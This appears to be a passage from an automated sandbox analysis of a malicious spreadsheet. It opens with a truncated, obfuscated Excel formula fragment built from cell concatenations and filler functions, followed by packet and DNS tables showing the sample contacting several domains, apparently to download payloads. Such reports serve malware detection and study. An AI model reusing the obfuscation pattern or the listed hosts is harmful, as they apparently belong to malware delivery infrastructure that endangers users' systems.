""&before.2.198.0.sheet!E201&Doc2!CG2&Doc2!CG3&Doc2!CG4&Doc2!CG5&Doc2!CG6&Doc2!CG7&Doc2!CG8&Doc2!CG9&Doc2!CG10&Doc2!CG11&Doc2!CG12&Doc2!CG13&Doc2!CG14&Doc2!CG15&Doc2!CG16&Doc2!CG17&Doc2!CG18&Doc2!CG19)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)",,,,,,,,,"=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(7842542893242350000,42)=TRUNC(278452452478923,425)=CEILING.PRECISE(784254

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2021 02:28:49.884731054 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.059053898 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.059151888 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.067166090 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.241056919 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.242530107 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.242585897 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.242623091 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.242659092 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.242700100 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.242727995 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.248172998 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.248295069 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.289589882 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:50.466690063 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:50.466836929 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.427393913 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.598391056 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:51.598417997 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:51.598468065 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.598493099 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.599040031 CEST	49167	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.600703955 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.764247894 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:51.764463902 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.765361071 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.766295910 CEST	443	49167	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:51.928503036 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:51.929195881 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:51.929347992 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.930105925 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:51.971596956 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:52.136404037 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.136614084 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195235014 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195297003 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195339918 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195377111 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195408106 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:52.195415974 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195444107 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:52.195452929 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.195477962 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:52.195509911 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:52.207185030 CEST	49169	443	192.168.2.22	207.174.213.126
Apr 4, 2021 02:28:52.283791065 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:52.372320890 CEST	443	49169	207.174.213.126	192.168.2.22
Apr 4, 2021 02:28:52.439570904 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:52.439692020 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:52.440716028 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:52.599021912 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:52.604233027 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:52.604278088 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:52.604314089 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:52.604496002 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:52.647279024 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:52.807611942 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:52.807904959 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:53.423402071 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:53.619838953 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:53.728195906 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:53.728260040 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:53.728478909 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:28:53.728553057 CEST	49170	443	192.168.2.22	162.241.62.4
Apr 4, 2021 02:28:53.795320988 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:53.954828978 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:53.954986095 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:53.955996990 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.115503073 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.121562004 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.121584892 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.121596098 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.121757030 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.164657116 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.328634024 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.328732967 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.381752968 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.568125010 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568156004 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568169117 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568186045 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568202019 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568217993 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568231106 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568249941 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568267107 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568283081 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.568423033 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.568454027 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.572263002 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.727972984 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.727996111 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728010893 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728029966 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728048086 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728061914 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728076935 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728094101 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728108883 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728126049 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728141069 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728177071 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728193045 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728236914 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728418112 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728425026 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728466034 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728471994 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728482008 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728502035 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728504896 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728521109 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728537083 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728538990 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728554010 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728569984 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.728570938 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.728600025 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.733318090 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.887808084 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887835026 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887846947 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887859106 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887875080 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887887955 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887907982 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887926102 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887940884 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887958050 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887974024 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.887989998 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888024092 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888041019 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888053894 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888062000 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.888066053 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888087034 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888102055 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.888106108 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888123035 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888139963 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888147116 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.888154984 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:54.888184071 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.888219118 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.893035889 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:54.901640892 CEST	49172	443	192.168.2.22	192.185.129.4
Apr 4, 2021 02:28:55.007057905 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.057322025 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.057431936 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.058497906 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.062719107 CEST	443	49172	192.185.129.4	192.168.2.22
Apr 4, 2021 02:28:55.108683109 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.138679028 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.138700008 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.138710976 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.138861895 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.182626009 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.250405073 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.250585079 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.284761906 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.376236916 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.763068914 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.763319016 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.763565063 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.763645887 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.764312983 CEST	49173	443	192.168.2.22	5.100.155.169
Apr 4, 2021 02:28:55.816961050 CEST	443	49173	5.100.155.169	192.168.2.22
Apr 4, 2021 02:28:55.840096951 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:55.973907948 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:55.974021912 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:55.974634886 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.110781908 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.114979982 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.115004063 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.115174055 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.115839958 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.115926027 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.116693974 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.116777897 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.130259991 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.264780045 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.265090942 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.276456118 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.449024916 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.519901991 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.520133018 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.520397902 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.520453930 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.520483017 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.520508051 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.520826101 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.520911932 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:28:56.654103994 CEST	443	49174	198.50.218.68	192.168.2.22
Apr 4, 2021 02:28:56.654289961 CEST	49174	443	192.168.2.22	198.50.218.68
Apr 4, 2021 02:29:23.728667974 CEST	443	49170	162.241.62.4	192.168.2.22
Apr 4, 2021 02:31:21.163839102 CEST	49191	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:21.164261103 CEST	49192	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:24.163423061 CEST	49192	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:24.179071903 CEST	49191	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:30.170021057 CEST	49192	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:30.185781002 CEST	49191	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:42.201504946 CEST	49195	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:45.209691048 CEST	49195	80	192.168.2.22	185.243.114.196
Apr 4, 2021 02:31:51.216182947 CEST	49195	80	192.168.2.22	185.243.114.196

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2021 02:28:49.802917004 CEST	52197	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:49.857023001 CEST	53	52197	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:50.849647999 CEST	53099	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:50.905261993 CEST	53	53099	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:50.910434008 CEST	52838	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:50.967322111 CEST	53	52838	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:52.222474098 CEST	61200	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:52.279391050 CEST	53	61200	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:52.917948961 CEST	49548	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:52.969299078 CEST	53	49548	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:52.983144999 CEST	55627	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:53.037698030 CEST	53	55627	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:53.736335993 CEST	56009	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:53.792759895 CEST	53	56009	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:54.927838087 CEST	61865	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:55.003125906 CEST	53	61865	8.8.8.8	192.168.2.22
Apr 4, 2021 02:28:55.781413078 CEST	55171	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:28:55.838114023 CEST	53	55171	8.8.8.8	192.168.2.22
Apr 4, 2021 02:30:35.073666096 CEST	52496	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:30:35.131855965 CEST	53	52496	8.8.8.8	192.168.2.22
Apr 4, 2021 02:30:37.890918016 CEST	57564	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:30:37.939728022 CEST	53	57564	8.8.8.8	192.168.2.22
Apr 4, 2021 02:30:38.063513994 CEST	63009	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:30:38.133888006 CEST	53	63009	8.8.8.8	192.168.2.22
Apr 4, 2021 02:30:39.213552952 CEST	59319	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:30:39.274941921 CEST	53	59319	8.8.8.8	192.168.2.22
Apr 4, 2021 02:30:39.281476021 CEST	53070	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:30:39.341922045 CEST	53	53070	8.8.8.8	192.168.2.22
Apr 4, 2021 02:30:39.486762047 CEST	59770	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:30:39.546601057 CEST	53	59770	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:07.569165945 CEST	61523	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:07.614052057 CEST	62791	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:07.629678965 CEST	53	61523	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:07.662575006 CEST	53	62791	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:08.625704050 CEST	62791	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:08.671598911 CEST	53	62791	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:09.638896942 CEST	62791	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:09.687602043 CEST	53	62791	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:11.651842117 CEST	62791	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:11.697877884 CEST	53	62791	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:15.660876989 CEST	62791	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:15.706768990 CEST	53	62791	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:20.292414904 CEST	50667	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:20.350671053 CEST	53	50667	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:21.067599058 CEST	54129	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:21.153742075 CEST	53	54129	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:24.755320072 CEST	65329	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:24.756930113 CEST	60718	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:24.757221937 CEST	49157	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:24.758107901 CEST	57391	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:24.758716106 CEST	61858	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:24.758951902 CEST	62500	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:24.809772015 CEST	53	65329	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:24.811321020 CEST	53	60718	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:24.812230110 CEST	53	57391	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:24.826551914 CEST	53	49157	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:24.827711105 CEST	53	61858	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:24.830976009 CEST	53	62500	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:25.922498941 CEST	51652	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:25.971399069 CEST	53	51652	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:50.920433998 CEST	62762	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:50.980890036 CEST	53	62762	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:51.934592962 CEST	62762	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:51.994234085 CEST	53	62762	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:52.948178053 CEST	62762	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:53.005289078 CEST	53	62762	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:54.258270979 CEST	56905	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:54.305494070 CEST	53	56905	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:54.961014986 CEST	62762	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:55.018142939 CEST	53	62762	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:55.272705078 CEST	56905	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:55.327233076 CEST	53	56905	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:56.287060022 CEST	56905	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:56.333197117 CEST	53	56905	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:58.299725056 CEST	56905	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:58.345614910 CEST	53	56905	8.8.8.8	192.168.2.22
Apr 4, 2021 02:31:58.970405102 CEST	62762	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:31:59.027731895 CEST	53	62762	8.8.8.8	192.168.2.22
Apr 4, 2021 02:32:02.310725927 CEST	56905	53	192.168.2.22	8.8.8.8
Apr 4, 2021 02:32:02.358973026 CEST	53	56905	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 4, 2021 02:28:49.802917004 CEST	192.168.2.22	8.8.8.8	0xed69	Standard query (0)	vts.us.com	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:52.222474098 CEST	192.168.2.22	8.8.8.8	0x887e	Standard query (0)	mundotecnologiasolar.com	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:53.736335993 CEST	192.168.2.22	8.8.8.8	0x500f	Standard query (0)	accesslinksgroup.com	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:54.927838087 CEST	192.168.2.22	8.8.8.8	0x938b	Standard query (0)	ponchokhana.com	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:55.781413078 CEST	192.168.2.22	8.8.8.8	0x5f9c	Standard query (0)	comosairdoburaco.com.br	A (IP address)	IN (0x0001)
Apr 4, 2021 02:30:39.281476021 CEST	192.168.2.22	8.8.8.8	0xcc51	Standard query (0)	login.microsoftonline.com	A (IP address)	IN (0x0001)
Apr 4, 2021 02:31:21.067599058 CEST	192.168.2.22	8.8.8.8	0xe4dd	Standard query (0)	under17.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 4, 2021 02:28:49.857023001 CEST	8.8.8.8	192.168.2.22	0xed69	No error (0)	vts.us.com		207.174.213.126	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:52.279391050 CEST	8.8.8.8	192.168.2.22	0x887e	No error (0)	mundotecnologiasolar.com		162.241.62.4	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:53.792759895 CEST	8.8.8.8	192.168.2.22	0x500f	No error (0)	accesslinksgroup.com		192.185.129.4	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:55.003125906 CEST	8.8.8.8	192.168.2.22	0x938b	No error (0)	ponchokhana.com		5.100.155.169	A (IP address)	IN (0x0001)
Apr 4, 2021 02:28:55.838114023 CEST	8.8.8.8	192.168.2.22	0x5f9c	No error (0)	comosairdoburaco.com.br		198.50.218.68	A (IP address)	IN (0x0001)
